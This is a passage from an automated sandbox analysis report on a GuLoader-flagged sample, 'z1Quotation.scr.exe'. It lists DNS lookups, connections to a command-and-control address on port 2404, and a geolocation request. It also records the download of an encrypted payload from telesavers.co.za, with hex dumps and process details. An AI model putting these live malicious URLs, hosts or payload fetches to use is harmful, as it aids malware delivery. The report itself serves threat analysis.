                                                                                                                Sep 30, 2024 12:09:17.557657957 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.682516098 CEST24044976323.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.682770967 CEST497632404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.729370117 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.764960051 CEST497672404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.780283928 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:17.994971991 CEST24044976323.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:17.995188951 CEST497632404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.042532921 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:18.077907085 CEST24044976723.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:18.092725992 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.279633045 CEST24044977023.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:18.281620026 CEST24044976423.106.238.209192.168.11.20
                                                                                                                Sep 30, 2024 12:09:18.281855106 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.281903982 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.281965017 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.282135010 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.282305956 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.282471895 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.282480955 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.282644987 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.282814980 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.282984018 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.282993078 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.283154011 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.283324003 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.283495903 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.283505917 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.283663988 CEST497642404192.168.11.2023.106.238.209
                                                                                                                Sep 30, 2024 12:09:18.283834934 CEST497642404192.168.11.2023.106.238.209

                                                                                                                DNS Queries

                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                Sep 30, 2024 12:03:15.037349939 CEST192.168.11.201.1.1.10xcac9Standard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:03:16.047183990 CEST192.168.11.209.9.9.90xcac9Standard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:03:26.218331099 CEST192.168.11.209.9.9.90xc015Standard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:03:36.371994019 CEST192.168.11.209.9.9.90x30a0Standard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:03:46.561256886 CEST192.168.11.209.9.9.90x6cecStandard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:03:56.726649046 CEST192.168.11.209.9.9.90xd478Standard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:06.880920887 CEST192.168.11.209.9.9.90xeea0Standard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:17.060866117 CEST192.168.11.209.9.9.90x8129Standard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:27.220055103 CEST192.168.11.209.9.9.90x97c4Standard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:37.374366999 CEST192.168.11.209.9.9.90x186dStandard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:47.529191971 CEST192.168.11.209.9.9.90xc1d2Standard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:57.683650970 CEST192.168.11.201.1.1.10xf882Standard query (0)telesavers.co.zaA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:05:02.717253923 CEST192.168.11.201.1.1.10xd657Standard query (0)subddfg.lolA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:05:04.591978073 CEST192.168.11.201.1.1.10x2729Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                DNS Answers

                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                Sep 30, 2024 12:03:16.198887110 CEST9.9.9.9192.168.11.200xcac9Name error (3)telesavers.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:03:16.779160976 CEST1.1.1.1192.168.11.200xcac9No error (0)telesavers.co.za102.65.21.26A (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:03:26.368653059 CEST9.9.9.9192.168.11.200xc015Name error (3)telesavers.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:03:36.522806883 CEST9.9.9.9192.168.11.200x30a0Name error (3)telesavers.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:03:46.719321966 CEST9.9.9.9192.168.11.200x6cecName error (3)telesavers.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:03:56.877348900 CEST9.9.9.9192.168.11.200xd478Name error (3)telesavers.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:07.031667948 CEST9.9.9.9192.168.11.200xeea0Name error (3)telesavers.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:17.213233948 CEST9.9.9.9192.168.11.200x8129Name error (3)telesavers.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:27.371959925 CEST9.9.9.9192.168.11.200x97c4Name error (3)telesavers.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:37.524411917 CEST9.9.9.9192.168.11.200x186dName error (3)telesavers.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:47.679611921 CEST9.9.9.9192.168.11.200xc1d2Name error (3)telesavers.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:04:58.598098993 CEST1.1.1.1192.168.11.200xf882No error (0)telesavers.co.za102.65.21.26A (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:05:02.876513958 CEST1.1.1.1192.168.11.200xd657No error (0)subddfg.lol23.106.238.209A (IP address)IN (0x0001)false
                                                                                                                Sep 30, 2024 12:05:04.743925095 CEST1.1.1.1192.168.11.200x2729No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                HTTP Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.11.2049762178.237.33.50801412C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                Sep 30, 2024 12:05:05.019148111 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                Host: geoplugin.net
                                                                                                                Cache-Control: no-cache
                                                                                                                Sep 30, 2024 12:05:05.295834064 CEST1169INHTTP/1.1 200 OK
                                                                                                                date: Mon, 30 Sep 2024 10:05:05 GMT
                                                                                                                server: Apache
                                                                                                                content-length: 961
                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                cache-control: public, max-age=300
                                                                                                                access-control-allow-origin: *
                                                                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                Data Ascii: { "geoplugin_request":"102.129.152.223", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                HTTPS Proxied Packets

                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                0192.168.11.2049760102.65.21.264431412C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-09-30 10:04:59 UTC175OUTGET /FrKSUMZ203.bin HTTP/1.1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                                Host: telesavers.co.za
                                                                                                                Cache-Control: no-cache
                                                                                                                2024-09-30 10:05:00 UTC249INHTTP/1.1 200 OK
                                                                                                                Date: Mon, 30 Sep 2024 10:05:00 GMT
                                                                                                                Server: Apache
                                                                                                                Upgrade: h2,h2c
                                                                                                                Connection: Upgrade, close
                                                                                                                Last-Modified: Mon, 30 Sep 2024 05:20:19 GMT
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 494656
                                                                                                                Content-Type: application/octet-stream
                                                                                                                2024-09-30 10:05:00 UTC7943INData Raw: d5 54 83 65 a4 a4 d8 ca dd ed 49 0d ff 15 0b a4 48 3c e0 39 fa 41 fb ac 7d 70 74 68 83 49 17 d3 41 19 9e 14 84 66 a5 f8 e2 5c 8a ca c9 39 29 bb d4 fd 8f ef da 43 85 79 4a ae 66 48 cb 4f 3e ee eb 5f bb a8 8c 6a 55 70 8e 06 ef 6c 05 87 7e eb 7d 0b 77 9b 37 c9 10 37 e2 6b b2 a3 e8 24 11 31 df d8 10 98 0e ca 6a 41 e6 b0 56 e6 e2 fe 9c b8 92 3d a7 04 42 5e d3 13 91 30 42 8e 21 e1 04 ae 98 99 98 3d df a5 9a 08 69 38 d7 64 58 42 3b c2 eb 2a 30 2b c8 df 51 84 2e 30 06 fb 7b b1 f5 2c ed 46 e3 d8 4a 4a 34 38 82 3e ab b6 35 76 ec 2d 05 8c 37 d8 7b 1f ac f2 58 b1 62 c3 82 7f d4 86 c4 47 0c 1b 30 01 17 d0 a8 3b 48 30 5c 65 ac 98 c8 e1 80 a0 d9 8c f4 ae 55 36 f9 2e 0d 6f fd 54 05 1f 3d 82 45 33 22 99 98 19 b9 67 4e ac 48 ac 7e 5e 5f 6f 30 93 b7 aa fe da 00 d1 76 0a 43
                                                                                                                Data Ascii: TeIH<9A}pthIAf\9)CyJfHO>_jUpl~}w77k$1jAV=B^0B!=i8dXB;*0+Q.0{,FJJ48>5v-7{XbG0;H0\eU6.oT=E3"gNH~^_o0vC
                                                                                                                2024-09-30 10:05:00 UTC8000INData Raw: a8 b4 b9 33 6b 16 6f 64 de 62 c5 7c 90 ab 02 6f 23 04 07 b9 de ac 64 7b 18 6a 8d d3 79 98 45 b7 68 73 8a c3 85 90 d4 da f2 77 f5 f0 b4 a9 f7 f8 86 a3 c2 6f de 3a 44 96 1b 08 3a b1 3f 5f f3 a8 fa 46 f4 7e 3e 5c 17 5b 57 7f a0 30 79 0d 52 e2 87 ac a3 7d 64 db bc 6b 96 20 bd 0f e0 84 51 c5 48 98 6b 8d 39 aa 37 da 0e 9c 24 5c 33 19 00 67 c4 fc c7 6e 85 d5 24 11 ee be 5a 4f 01 dd d7 fd de 39 3c 7d db 90 d0 d3 4f 3d b6 ca b3 ea 57 50 fa d4 23 47 82 b0 72 8a 06 66 29 16 fb 33 17 3a e0 4f 12 52 39 9b 72 aa e2 f7 ab 2e 61 ed 33 9f 88 9b d5 e6 22 f9 b7 19 4f dd 2e 0a 40 9e b8 92 b4 e2 e8 85 1b 2f 12 91 30 42 36 ae cb 44 ae 55 05 6f cf 20 9a ee 2d c3 f5 de a3 c8 6f ea 71 f6 42 43 d0 75 58 4c 00 b0 a2 76 67 6f 33 73 99 9d 66 81 e4 3a d0 b3 bf 5d a8 46 52 7d 53 bf 67
                                                                                                                Data Ascii: 3kodb|o#d{jyEhswo:D:?_F~>\[W0yR}dk QHk97$\3gn$ZO9<}O=WP#Grf)3:OR9r.a3"O.@/0B6DUo -oqBCuXLvgo3sf:]FR}Sg
                                                                                                                2024-09-30 10:05:00 UTC8000INData Raw: 0d b7 dc 5e 3d 94 11 57 3c a6 e1 d2 86 ab e9 c0 9f b1 34 1a d8 99 5b b0 cd 2f 8c fc b3 d4 97 9d 3a 90 1d aa ef a3 dc fb f0 1b 51 87 7b 0f a8 a5 79 5a bd 7d 26 44 2b 7a 8a f8 38 f6 2b d6 7a 85 ba 7e 78 7a f3 45 dd f5 95 65 57 de 44 a3 fa 6d 8d 7c 4a bf 44 b0 02 51 00 63 55 5d 9c 00 a8 91 5e 78 16 90 33 dc 4a d8 87 b3 8b cb 5b 1f d1 48 cc 15 42 0f 71 07 77 ec 52 3d 07 75 f9 fa 65 84 7b 1a c4 84 e8 8a f3 75 3f 09 2c ff e5 19 7f 6a 53 5f d3 b2 4d 6e 81 70 cb fe eb e7 3c dd e5 1c b5 17 2b 89 14 2b 48 27 40 47 b3 aa 8f e0 02 b1 5f 21 f5 33 0b 96 08 b1 f1 3b 40 55 cf 4a 28 b5 a3 e8 72 9c 76 f3 88 43 15 43 2a 82 4d e1 b0 56 b6 0a 4d 82 bb 92 be 63 08 cf 1b 2b 9e dc d0 14 de 6f 08 f1 a8 96 86 72 db 43 0f 90 c5 cb 44 da a5 d0 6b e2 e7 62 0f 40 31 b2 58 eb f0 4f 5d
                                                                                                                Data Ascii: ^=W<4[/:Q{yZ}&D+z8+z~xzEeWDm|JDQcU]^x3J[HBqwR=ue{u?,jS_Mnp<++H'@G_!3;@UJ(rvCC*MVMc+orCDkb@1XO]
                                                                                                                2024-09-30 10:05:00 UTC8000INData Raw: 90 4b 92 af 78 4c a4 61 82 36 04 e6 21 76 1a 54 3e 95 a8 01 95 73 21 b6 02 40 64 3b 4d 1f d6 ad 19 97 0b 67 7e fc a2 fd 37 8c 90 e7 6a b0 34 14 a3 62 eb a8 2f 27 4e a7 9f b3 54 c9 34 ad ec 8d b2 28 6c 93 1e 2f a9 d7 73 67 31 02 be f8 72 84 a0 e1 ba 1c 97 8e 52 a5 e2 7d f3 14 02 0a 6a 0d b7 a2 7b 0f d4 75 59 f5 a2 88 c6 99 02 23 a5 af d6 40 2a 7c 93 2c 9e dd 1a 6c ec f6 4a ac ab ca 56 ac a6 c9 de a3 d8 62 51 58 12 fe 2a ea 26 73 03 ea 73 36 0d 18 e4 28 d5 04 58 3c 4a 8a 5c 2a ae 59 53 65 44 b3 c4 9f 8c e9 95 dd 57 7f 27 7c 04 93 2f 0e e1 15 38 43 7c 5b 66 6b 8e f3 40 fd d0 aa 8f 03 42 cb 7c 71 b5 f3 af e1 1b 27 c8 df a8 aa c8 5d e0 7f 28 18 cc 96 84 20 27 9b 4e 85 02 82 fd a8 b2 56 6d 8e da 84 35 d7 c6 f7 8d 06 7a cf fb 7a ed 40 8e ba 24 08 25 66 ec 27 6a
                                                                                                                Data Ascii: KxLa6!vT>s!@d;Mg~7j4b/'NT4(l/sg1rR}j{uY#@*|,lJVbQX*&ss6(X<J\*YSeDW'|/8C|[fk@B|q']( 'NVm5zz@$%f'j
                                                                                                                2024-09-30 10:05:00 UTC8000INData Raw: 32 88 02 a2 c4 c3 1c c1 e3 e3 7a d1 ea bf ee e5 37 d6 33 5f 17 d4 78 be c4 25 89 a9 5d cd 2c 69 19 d6 36 ce 41 b3 4a b2 47 2c 41 43 8f 69 88 0d b4 5e 2c 64 c1 6c 5f 96 86 a1 6a b4 7f 3d 92 44 b0 77 c3 4f 46 d4 3e 25 f3 75 44 62 4e 30 84 25 9f 84 51 b6 8c 95 7e 69 6c 7b 10 4b 55 d7 7d 1c 82 8b 55 84 da 13 2c 8b d7 da 97 96 b2 78 f9 e6 f3 72 dd f5 95 bf 30 02 27 6f 04 8a 2d 6a b5 42 dc f4 b8 ae 63 8f b7 29 74 0e 21 6d 3b c4 67 87 a5 8a 4b d8 19 80 cf 62 a7 96 1d 20 34 22 a4 e2 df 14 2c 56 49 ee 03 19 7a 35 0d 11 a1 10 39 93 13 0c 5a 75 c2 41 d4 bb e5 1f 7b 55 e5 9c 8d e9 c6 0b e1 aa e4 b9 be 6c df db 31 3d e6 41 8a 87 a1 5b fa d4 b8 80 ee c6 70 8a 06 87 54 9f 3e 7e 66 40 73 8a 64 c8 99 f8 06 d2 68 b2 fa b1 a1 d1 45 66 b0 0c fe 48 ca e7 c4 9e 4d a9 19 b2 16
                                                                                                                Data Ascii: 2z73_x%],i6AJG,ACi^,dl_j=DwOF>%uDbN0%Q~il{KU}U,xr0'o-jBc)t!m;gKb 4",VIz59ZuA{Ul1=A[pT>~f@sdhEfHM
                                                                                                                2024-09-30 10:05:01 UTC8000INData Raw: 99 79 20 80 85 08 0b 9b d3 31 1d f8 4e 3f 56 45 a8 41 2a 68 de ee c5 88 15 be 5c 51 59 4c c4 3d 2b 18 96 f9 ee 8e 87 b8 9c 2d d1 3c 78 7c 25 25 89 a4 28 01 b1 1a e5 28 42 82 45 55 b7 81 35 39 c2 de 8f d8 f3 f2 4b 58 91 23 e4 51 85 7f 6d 54 51 53 a4 66 54 ac b0 86 76 b1 b9 00 2a 00 10 41 d2 9d 3c 14 b8 53 31 29 a4 04 7b c4 ea 3d 2b 7b 7b 6e d5 28 0f c9 77 4e f9 3c 8a 93 b0 99 6e 25 4a 4e f6 d1 cc c2 ba 2c 2a 0a 1e 29 53 66 b9 90 6d 25 2d 2f 3a c4 35 66 78 6e 9c 22 b3 10 b8 ab 84 d2 ab ca 0d f3 95 e1 24 51 93 6a 85 73 67 bc 96 e8 dc d2 18 0e 99 90 61 67 98 33 a7 49 5a de fc e7 db a3 94 e1 a0 78 20 62 c1 92 b9 01 b5 17 ff 7e 29 cf 01 a5 e2 f7 34 dd 0a 01 41 3c 5d 12 2d 28 0e 75 0b fd 12 2b 49 0f e8 67 4b 22 8f 75 8b a3 48 d2 90 66 9c 3a f4 fc 56 df 7c 6b c8
                                                                                                                Data Ascii: y 1N?VEA*h\QYL=+-<x|%%((BEU59KX#QmTQSfTv*A<S1){=+{{n(wN<n%JN,*)Sfm%-/:5fxn"$Qjsgag3IZx b~)4A<]-(u+IgK"uHf:V|k
                                                                                                                2024-09-30 10:05:01 UTC8000INData Raw: 12 3e 6a 6f ab da 1e f7 8d 07 b1 87 9e ad a9 1a 82 3d fa 90 50 8b 90 0b 78 fc ff 93 5c cc 2e 15 f1 85 be ac 13 45 a6 4e b6 45 24 54 d2 53 25 fb 24 d6 1e 4c ae 1c 64 ba ae 56 83 20 f3 43 36 02 d7 b9 28 27 15 10 89 db 49 51 49 7b 67 c1 73 1a 52 54 4c 33 72 81 e1 44 98 49 04 db 39 9e d9 40 04 a7 73 97 d6 73 23 e1 c7 58 d8 39 a7 19 e9 58 a8 d4 3e 01 4b a8 ab 9f b1 58 11 0e 61 6c 5c ac 7b 82 5f 23 84 93 e0 79 56 28 a0 66 db 06 39 3e 8a fe 14 9a 9a 57 5f 2b 31 3a e4 c2 b1 e9 d5 f5 d3 65 45 ae b3 fd 1f 38 3a d2 1e 00 8f 99 70 e3 38 97 72 0b 63 7c e7 66 8c 6b 79 9d 07 ca e0 ac 80 16 e4 13 15 1f ec ad 79 9a ec e1 64 eb 5e 7b 9d d0 ad 6d ff 63 dd 11 69 b4 2c dc 25 a3 f3 d3 5a a8 ae 16 f0 cd 44 a5 31 60 99 99 55 ce dc 39 01 7b 7e 18 db d3 4c d4 b6 a9 21 68 12 59 ee
                                                                                                                Data Ascii: >jo=Px\.ENE$TS%$LdV C6('IQI{gsRTL3rDI9@ss#X9X>KXal\{_#yV(f9>W_+1:eE8:p8rc|fkyyd^{mci,%ZD1`U9{~L!hY
                                                                                                                2024-09-30 10:05:01 UTC8000INData Raw: 16 9c be 71 7f 45 7a f8 7f 98 5f b6 e8 11 d8 98 05 7a 37 a7 7d 94 3d a3 32 79 d7 da 89 a8 63 85 91 81 05 2d cc ab 92 2a 7c d7 e2 90 21 e6 0c eb e8 c6 4e 3f 58 03 02 1b 8b 2f df 03 33 05 04 89 af b9 4f 9e ea f5 47 26 41 8e a2 2f c4 77 37 56 f9 66 f3 ce 95 96 7e fc 91 bb 58 b0 62 72 f8 70 a5 34 8f 70 90 c6 6b f5 03 7a ca 80 45 ea 98 49 da 86 58 50 8d 88 7f ad 06 9f 0d d3 23 e1 cb 58 17 5d a7 19 95 c5 a9 d4 36 0d 90 8e 2d e8 bd 08 74 26 26 7b 23 76 c9 99 3a 9a 54 84 6c e9 af 63 85 df ce fd 6c 25 01 9e 89 2c 9d da 4c 48 4b 1d a3 2a 1b e8 23 b1 b1 ee ba be c5 05 86 23 3a 2b 2b 55 70 3f a4 25 2e 21 fc 58 9c 6a f7 5e 2c ca 1a f4 a7 f6 4a e0 6d bd 7d 61 43 1f dc e7 75 4e 07 0f 99 14 62 ab b9 cd ad 6d b1 c9 79 b8 2c b4 fc 1e ee 5c 55 01 9b c1 42 ae 0d d7 82 a5 9e
                                                                                                                Data Ascii: qEz_z7}=2yc-*|!N?X/3OG&A/w7Vf~Xbrp4pkzEIXP#X]6-t&&{#v:Tlcl%,LHK*##:++Up?%.!Xj^,Jm}aCuNbmy,\UB
                                                                                                                2024-09-30 10:05:01 UTC8000INData Raw: 23 d2 76 ad 79 69 4f 58 f5 35 4b dd c9 3a 95 15 5b 7d 91 3c 98 a1 17 df 34 66 e7 f0 d5 20 05 12 58 d2 96 2b 27 67 71 7b 03 0e 4f 78 47 20 31 15 87 25 76 57 6b 1d 95 12 40 11 00 43 e1 1d 6b 5d a9 74 c9 0d ff 9d 53 69 2f ba 9d 61 1a 15 07 43 07 3a 27 0b 02 3a e2 2a c3 a7 fa d7 c8 f8 ec 3f a4 a4 54 75 b2 9a ca ef 8f ea 77 59 16 d0 80 9f ba e8 70 24 10 51 3b 42 ab 01 21 41 bd 54 3e f5 8e 4d 79 90 a3 ba 8e 49 90 f3 62 40 a2 1e 57 87 95 7e 8a b8 04 40 8f 7f 24 c2 72 58 5c 5c 73 e9 f0 0d 59 d1 95 48 17 42 26 d4 c0 72 c0 59 f6 86 0e 53 6c d1 20 93 d4 8d 43 32 8e 5f da f6 90 ca 89 8a f2 29 62 0a 4b 73 42 6c 15 80 d7 6b ff ee eb 3f 7a be 0a c5 b5 0e fb 2a d9 8e 60 7e 7f df 59 82 e5 ed f7 15 71 ab 5a 8a 73 d8 ef 42 f7 ac 07 b0 0d a5 cb 45 8b 4e 66 eb 5e 6f bf 3b 1d
                                                                                                                Data Ascii: #vyiOX5K:[}<4f X+'gq{OxG 1%vWk@Ck]tSi/aC:':*?TuwYp$Q;B!AT>MyIb@W~@$rX\\sYHB&rYSl C2_)bKsBlk?z*`~YqZsBENf^o;
                                                                                                                2024-09-30 10:05:01 UTC8000INData Raw: aa c3 de 65 9a 8b 3d d5 8d fa f7 f5 53 80 39 a3 80 33 fc 9a 90 cd b3 54 d8 46 44 bd 10 4c a0 e8 d2 be 3a e1 43 61 ca 7f 1b f0 3e 54 be e0 02 01 fc b6 f1 34 0d 68 8f a3 88 d4 98 97 a8 48 27 7a 58 f4 ad 90 3e 1a 9b cd ee ad 1e be 3a da 23 64 36 57 6a 56 47 4e 2b b4 bc 85 66 ff a0 c0 46 d7 39 f6 f5 6e 31 b2 03 a1 ae 03 1a b3 56 ee d2 04 75 ab cc 90 98 8c da b3 fa 7c c6 be ee 0c f0 9d 09 d3 32 f4 90 cf d2 57 f3 fc ed fe 3b 66 70 3c c5 de e8 ab 3e 0b 36 3a 21 13 67 a6 8f f2 a1 2f f1 ed 29 d9 83 fd 79 74 51 b9 d7 22 9a 64 0e 19 7f b4 2a 1c 73 16 0e 48 43 d8 b1 08 f4 b7 1d c2 dc 70 4b 95 ce 94 92 84 18 fe 41 cb e3 99 ce 2f f3 ff 4a 74 50 d7 6e 25 e5 48 87 9d 27 6f 1b 65 50 2d 68 19 44 9a 30 7a e2 e6 97 3a cf 97 fd e3 25 53 17 80 31 d9 2c 83 6c a1 80 65 7f 35 be
                                                                                                                Data Ascii: e=S93TFDL:Ca>T4hH'zX>:#d6WjVGN+fF9n1Vu|2W;fp<>6:!g/)ytQ"d*sHCpKA/JtPn%H'oeP-hD0z:%S1,le5


                                                                                                                Statistics

                                                                                                                CPU Usage

                                                                                                                Click to jump to process

                                                                                                                Memory Usage

                                                                                                                Click to jump to process

                                                                                                                High Level Behavior Distribution

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Behavior

                                                                                                                Click to jump to process

                                                                                                                System Behavior

                                                                                                                General

                                                                                                                Target ID:0
                                                                                                                Start time:06:02:22
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Users\user\Desktop\z1Quotation.scr.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\z1Quotation.scr.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:583'221 bytes
                                                                                                                MD5 hash:0A648622633DBD21FEF151B525657B2C
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.33493748290.0000000000637000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.33493748290.0000000000685000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.33493748290.0000000000698000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.33495375188.0000000006463000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                General

                                                                                                                Target ID:2
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:cmd.exe /c set /a "250^177"
                                                                                                                Imagebase:
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:
                                                                                                                Has administrator privileges:
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                General

                                                                                                                Target ID:3
                                                                                                                Start time:06:02:23
                                                                                                                Start date:30/09/2024
                                                                                                                Path:C:\Windows\System32\Conhost.exe
                                                                                                                Wow64 process (32bit):
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:
                                                                                                                File size:875'008 bytes
                                                                                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
